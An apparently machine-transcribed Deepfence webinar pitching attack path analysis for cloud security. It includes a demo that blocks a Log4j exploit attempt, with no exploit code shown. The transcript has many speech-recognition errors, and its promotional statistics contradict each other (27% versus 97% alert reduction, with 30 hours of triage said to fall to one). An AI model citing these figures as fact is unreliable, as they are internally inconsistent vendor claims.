 All right. Hi, everyone. Welcome to today's webinar hosted by Deep Fence. Today's topic is understanding attack pass, the key to alert fatigue reduction and better remediation. I'm Ryan Smith, head of product and solutions at Deep Fence. Today with me I have Shom Krishna Swamy, our Chief Technology Officer. Welcome, Shom. Appreciate you joining us today. Hi, Ryan. Hello, everyone. I wanted to start with, you know, what we think is an unprecedented security challenges that companies face when they go move into hybrid, multi cloud environments or even single cloud environments because the landscape of those environments has changed drastically. Whether it's the types of infrastructure and hosting services available to you, whether it's the differentiation between ISPAS and SAS within the cloud, whether it's the just demands of the different hosting requirements you might have. This new complexity within these cloud environments, whether it comes from infrastructure complexity or application complexity has caused us to need new detection methods for what we're deploying. So this has led to tool proliferation within the cloud environments. All of my security teams have on average 75 security tools that they've bought. I'm sure, you know, you could go through the categories of workload protection, firewalls, CASB, CSPM tools, then you quickly realize how many tools you have within your own security ecosystem and budget. All of these tools are spouting off alerts to the tune of greater than 500 public cloud security alerts daily that are reviewed by stocks. So these tools are proliferating not only these alerts, but, you know, people have to respond to these. They have to either, you know, ensure that they're not false positives. They have to validate the alert they're seeing and because teams have limited resources, limited time, limited money, limited subject matter expertise of those resources. They're missing alerts, right, because they're having to swivel chair between 75 apps. They're having to review those with the limited staff that they have. And 55% of organizations have reported missing key alerts in security incidents, either daily, weekly or hourly. So half of the companies out there are missing critical security incidents daily due to alert fatigue. It doesn't just impact our security posture, though, it impacts our resourcing and our people and our efficiency within our security operations in dealing with different types of alerts. So, 62% of organizations have said that alert fatigue has caused turnover for them within their staff. And we already know that security engineers, sock professionals, analysts are some of the, you know, staff that's hardest to find within today's environments. And so they're losing critical staff that they can't hire back quick enough due to alert fatigue turnover. 30 hours out of a 40 hour week of a security analyst within the sock is spent triaging alerts. That leaves just 10 hours out of your normal 40 hour work week, where they can actually do higher level orders out of activity such as detection response, instant remediation, forensics, threat intelligence analysis, security engineering, all of these other key functions of a sock go underserved because we're just dealing with alerts all day. So not only are we dealing with alerts all day but this causes burnout fatigue turnover. But there's hope here, right. The statistics, the research, the data indicate that with proper risk prioritization and what we mean by that is not just identifying vulnerabilities, but evaluating them according to their exploitability within the environment. So 27% of alerts that we get from our security tooling can be reduced. So that, you know, 30 hours a week turns into one hour a week of alert triaging. And it opens up so much more potential for our security teams to contribute in positive ways to our security risk and compliance posture that we didn't have before. So we're really excited to kind of dive into this topic a little bit today but you know we think cloud security needs a little bit of a reset because as we've seen alert fatigue is off the charts. It's actively hurting your security resources and teams. So definitely adding more tools and more software to the equation doesn't seem to help. It just creates more silos, more fragmentation within our security alerting and our detection and response. And so how do we really break free of this Sisyphian endeavor of, you know, rolling up the hill, right with with all of these things. And that brings us to kind of the topic of today's webinar which is that with attack path identification management, analysis, etc. By adding more context to the security scans and results we're getting in our environment, ultimately leads to better risk reduction, and the ability to remediate those alerts with the proper controls. So you can better situate how your controls are performed in where they're needed within the environment so you're effectively spending your security resources whether those be technology resources or people resources. Defense approaches this issue of how do we identify attack paths by creating what we call to be the threat graph in what the defense threat graph is for us and it's available across our product suite is runtime context or security capability within your environment. And what we mean by that is, we don't just scan your environment for where risk is, even though we identify what vulnerabilities you have where you might have malware within the environment, exposed secrets within your environment, or even misconfiguration issues that could lead to cloud breaches. But we had what we know about the runtime context of the deployment of that application in the cloud, whether that be net flow information and who's talking to you know what that looks like to create for you which of those vulnerabilities malware, exposed secrets, misconfigurations is actually exploitable by a threat actor, and identifying and helping you map the actual attack path they would take to exploit that vulnerability. So the example we always give is, and Sean's going to show this later in the demo is you might have two machines on the network that are both infected with a zero day like log for show and log for Jay, like we were all worried about last last Christmas time. And, you know, when you're thinking about remediating an environment that might have thousands of instances of log for show like our customers, it's important to know which instances are actually attackable. So what deep ends would do in that scenario is evaluate, not only is log for show and memory on that asset, or that endpoint, but could a threat actor actually make the Jan di to LDAP server connection necessary to execute the remote code execution that they would want as the outcome of exploiting that vulnerability. And if we can identify that attack path for you, we can eliminate all of the instances of log for shell for your environment that don't have that particular attack path open. So what this does is when in a zero day scenario when you're scrambling to remediate your environment, find out whether you've been hit already or not. It allows you to prioritize where to put protections where to put remediation efforts where to spend your people resources remediating those assets, and not focus on the 97% of other instances that have that vulnerability, but aren't really exposed or attackable in a way based on how a threat actor would use a particular tactic technique procedure. This also allows you to remediate those attack pass, which brings us full circle to how does this allow better remediation. Well, in those scenarios, we can put appropriate controls and coverage on the assets that have that attack vector available in these choke points, you know, ultimately do that. We're going to come back to that screen, these two screens here, but I wanted to kind of go into, you know, how this reduces alert fatigue and remediation, and then we'll go into a little bit of how we do it on the previous screens. So, when we look at this threat graph, what what this actually does for an environment is it takes, instead of all these instances of unique vulnerabilities that you might have, ie, those, all those instances of log for shell and within the environment, we drop it down to a list of the vulnerabilities that are actually exploitable within your environment, and then rank the exploitable by vulnerabilities by severity, whether they have exploits available CVS score. This gives you your hit list of which vulnerabilities you need to actually remediate based on their accessibility and explutability within your environment and here you can see we have about 60% reduction at this particular environment, particularly in your high and vulnerabilities, which is where a lot of your vulnerability management teams would spend their efforts. And so we've reduced time spent here, we've reduced the effort on attack pass that wouldn't actually do, and we put a focus on what I call the choke points within the environment, which ultimately helps accelerate your security operations. And so if we can deal with and remediate along these top level attack vectors that might have other underlying assets nodes, part the images within those things. We can eliminate those types of attacks. And this is pretty typical almost project management behavior that it allows security operations teams to undertake, right project management teams have different weighting that one of the most common is this shift right smallest effort, greatest impact is what that tries to do. And so if we can evaluate our high value targets within the environment by identifying these attack vectors, then our remediation efforts ultimately become that smallest effort with the biggest impact of security leverage and risk within our environment. And so this ultimately leads to better remediation within the environment, what we call security observability because you get real time visibility of those assets, and a continuous assessment of their security posture based on that runtime real context, which allows you to make better management decisions project management decisions around resource allocation, whether that be where do I put certain security controls, where do I have to spend on security controls that controls come often in a consumption model, where do I need to target my people resources when I do patching efforts when I'm looking at remediation efforts or forensics and response in a zero day scenario where I've already been impacted or exploited. And ultimately it helps us ensure compliance because all of this is continuous, rather than point in time static snapshots of our environment so it allows better upkeep of these things in real time. So, once again, like, what is the key to security observability attack identification. Well, for us, it's these four pillars that really converge and unless you're adding these four contextual pillars to your environment, then you're just getting vulnerabilities ranked by severity and CSPM results rank by severity and you're seeing all of these things in different platforms that you're having to swivel the chair. It's like putting together pieces of a puzzle, but you're missing like four pieces right in the end you're going to have an incomplete picture of the, you know, true coverage of the attack or what happened because these these data points are going to be in different systems, they're not going to have the same context associated with what's happening in the environment. They're going to be at different points of time so for defense, we really need to always think about measuring and contextualizing the attack surface of the environment. With network flow information, cloud metadata, vulnerability CSPM, malware scan results, putting all of this within a singular platform and system, evaluating what comes in and what goes out of an environment so this is true traffic analysis and deep packet inspection, but targeted deep packet inspection because doing deep packet inspection across all North South, all East West, all the time would be not only resource and time and money intensive on your infrastructure systems, but it just wouldn't be effective from, you know, prioritizing how we spend our security resources. So that analysis of what comes in what goes out allows us to identify what's changed within the cloud, the applications themselves the traffic the process behavior and better lead to security decisions so defense ultimately provides you a platform built on context and you know we kind of talked about alert fatigue earlier in the conversation. This is why alert fatigue happens in the first place is because all of these fundamental controls data analysis things, environment coverage, all of that complexity needs to be housed within a singular platform, a singular system that ultimately allows us to provide better security observability attack path identification, and then ultimately remediation and coverage of the digital attack surface within our enterprise environments. The last thing I'll cover is, you know, we, you know, we talked about the alert fatigue benefits 97% reduction, which helps, you know, ultimately converge along these items right which is, you know, less triaging that 30 hours a week becomes an hour a week. So for your average sock employee, you're saving $1,500 a week of people costs, just on that. This, you know, cost savings, whether it be by consolidating all of those critical cloud alerts and contextual data points into a singular platform, or the people cost associated with managing kind of the alert fatigue that comes from traditional security systems, you know, platforms that approach risk risk reduction with attack path analysis, ultimately can save to earn 45 business days on average, roughly $300,000 a year. And that's significant, particularly in tougher economic times, when we're thinking about ROI of our security decisions. You know, we really think that approaches around attack path analysis are important to cost and time analysis as well. I'm going to dive into a demo but I do think we have one question, which was just around sources for the statistics and yes we can provide the sources there in the notes of the PowerPoint. When we send out the slides so you know that's various research from various studies but each of those are outlined in the notes. So, you know, we kind of wanted to shift today's webinar to a demo around how attack path analysis affects remediation and Sean's going to show kind of two systems within defense and the differences between why attack path analysis is important. Sean, over to you. Thank you Ryan. Hello everyone. Thank you for joining us today. We did hear Ryan talk about what is attack path and why is it important, how does it work. So let's look at this attack path from a different perspective of what do we do next, right, now that we have built an attack path, now that we have looked at various vulnerabilities, secrets, malwares, cloud scans, the search scans within cloud services. What do we do with it next, what do we want to do with it, how does the attack path help us to be have a better security. So what we're going to do now is I'm going to share my screen, and we're going to look at attack path within our platform, and we're going to go ahead, see what would happen if somebody's trying to kind of take advantage of some of the exposed vulnerabilities or somebody trying to exploit those vulnerabilities. How is it that we can protect ourselves when someone tries to exploit those vulnerabilities. Of course, we're all able to see my screen out here. So here is the attack path that exists within a sample demo environment. Now this attack path, as I said, he uses various vulnerabilities, secrets, there's scans within the various cloud services to build up that's an attack path. In a little bit more detail, let's go over and look at some of the other results that feed into this attack path. For example, here is a set of vulnerabilities that are available to us from various vulnerable scans. In particular, we're going to take the vulnerability scans for the container to illustrate this attack path. Let's take vulnerability scans on our WordPress MySQL, a sample of a vulnerable application. When we take the vulnerability scans of this, what we do is as a first step, we look at these vulnerability scans result and then their CV score, their readability, what Brian explained as a previous part of the discussion around. I have a vulnerability. Is it really exploitable? Which would mean that there need to be a multiple set of factors for this vulnerability to be actually exploited. The most obvious one is this vulnerability network reachable. Does this vulnerability have any known exploit? What happens next when this vulnerability exists within my system? DeepFence, by default, provides a way to categorize all these vulnerabilities and answer the question of is this vulnerability indeed exploitable? And to do that, DeepFence adds context. As Ryan explained earlier in his session, adding context to any issues that we find helps us to prioritize the issue. As we can very well see from a lab that our vulnerabilities, just by adding context, just by being able to understand the nature of our vulnerability, we are able to bring it down to a number where we can understand what is it that we need to fix first. Now, this is for vulnerabilities. Similarly, we pick in the secrets. We pick in the reference for various problems to build out this paragraph. Now, just a while ago, we just discussed about the results of various vulnerabilities and those results being fed into this attack. Here's a sample here. As you can see, there is a container here where this is a sample container where we see that there's a bunch of vulnerabilities which have been identified as being exploitable and which have a path to be exploited. Now, the reason why this container features here, but not the other MySQL or the WordPress containers is simply because of the fact that those vulnerabilities are not directly exploitable. Now, in addition to this, this platform, the DeepFence platform, is also able to understand context here, which means that the vulnerabilities that exist within this container can be reached through another container, right? So, which means that the vulnerabilities not only is this platform being able to add run-time context. The run-time context is also meaningful here in a way that how can these vulnerabilities be exploited? What is the path to these vulnerabilities being exploited? And that uses more, and this run-time observation gives us an ability to plot this for all the users of this platform so that they can focus those that really matter. So now, as we saw here, we did have vulnerabilities of few other containers, but the mere fact that those vulnerabilities are not reachable or they belong to a different class of exploitability, we were able to build up this attack graph, right? So now, we have built this attack graph. We have looked at the various risks within our environment. We have added a run-time context into all this to get here. So here comes the next important part, which is, what do we do with this? Now, the most obvious thing here is we have provided a tool for the security operations program to start their remediation process. But then again, over the course of this remediation, as most of us know, remediation is not a one-day on-time effort. It is a continuous process. So during this continuous process, how do we make sure, how do we ensure that the vulnerabilities that do exist in the system are not exploited? And this is where the run-time piece of the platform comes into play. What happens is, follows right. And Ryan spoke about being able to focus and target our efforts of being able to understand what comes in and what goes on within the whole infrastructure, right? So what we can do is, we go back here, and we look at those systems that have the container that's running in, and we start the east-western, north-western traffic analysis on that system. Now at SK, you can always use the various APLs that we provide within this platform to be able to perform the same east-western, north-south deep packet inspection, right? So let's take a quick look at what we mean when we do say, we mean the east-western, north-south deep packet inspection, right? Earlier on, Ryan spoke about being able to target our efforts, right? So what we do is, we look at the various processes within our system. We do those policies that are receiving traffic, and we start the whole east-western, north-south, basically what comes in and what goes on. The two important pillars of the whole security observability on those processes that really matter. As a sample here, we have started traffic inspection on these two projects, which are only two processes within the system. And we have specified it on a various set of advanced framework on the various blockchain applications and categorizations of your various aspects within your system. For example, I am getting a remote payload. Is it a recon attempt on my system, right? I am getting a payload that is purely an SQL injection attack, right? These are the various categories and classification within the whole front-end scenario. Now that we have started this whole east-western north-south packet inspection, that would help us to build and that would help us to understand the various alerts or various events that happen in our system. That, for example, helps us to look at very low-level payloads that come into our system like this that I am showing here, right? So now, what happened was, we built the attack graph, we then started the east-western north-south packet inspection, and we were able to see that low-level information on what's going on and the various attempts to exploit those issues or those vulnerabilities, secrets, malware, or complex misconfigurations within our infrastructure, right? Now, going above and beyond this, we would also like a platform like this to be able to protect ourselves from these kinds of exploitation. To that extent, we help to check on the security policy. Here's an example of a security policy that is set within the system that helps to understand, for example, how we set the traffic security policy, where you say that if malicious payload is available within the network, please go ahead and block the standard of the traffic to this network, right? We are able to set various security policies and I'm going to quickly show an attempt to exploit one such vulnerability. Now, we did see the log4j vulnerability coming up in our attack path. We also saw some previous attempts to be able to exploit the attack path. And here is a security policy that we have set that will stop any such attempt to exploit that vulnerability. Now, let me go ahead and run an exploit and we will see how we are able to block the exploit. Now, I have here a exploit that is prepared. Let me just quickly show the contents of the exploit. It's a standard log4j exploit and I'm going to start the exploit. Now, once I start the exploit, I do see that there's a kind of a response that I get here and you will see that further communication attempts to this server has been completely blocked. For example, if I were to do a curl again to the same IP address, I would see that I'm being blocked here because a protection policy has been set and as you see here, the IP address has been blocked for the next 10 minutes. Here is a log that just came into my system. A protection policy has been set and it has been in full. Right. So this is the whole sequence that we can, we are able to, we are able to prioritize our remediation efforts, and we are also able to prioritize our protection efforts. We are able to set effective policies that help us to block the senders of such malicious attacks. Back to you, Ryan, to continue the discussion. Perfect. Appreciate that, Sean. Thank you for contextualizing for us everything that we talked about previously. It's always, you know, at least from my perspective better to see those things in action, rather than just see a bunch of attacks and slides about it. So I really appreciate the hands on look of how deep fence at least deals with attack path identification and how we use that to better target remediation efforts for our customers within the cloud. It's great to see that live blocking of those zero day scenarios based on that traffic analysis. I'm just going to bring up, you know, one more slide and then we can get into any additional questions people might have but you know we always do want to share with you the ability to try out defense now. Largely loved by our community we have over 5000 stars across our products on GitHub. If you'd like to go into our GitHub and star any of our repos we'd appreciate that love and support from our community if you thought what you saw was cool here today. You can get started with our products if you just go to the get defense link on our homepage. And then if you want to further engage with our community read product documentation get tips and tutorials or check out our slack channel, then click that last link which will take you to our community page for further engagement.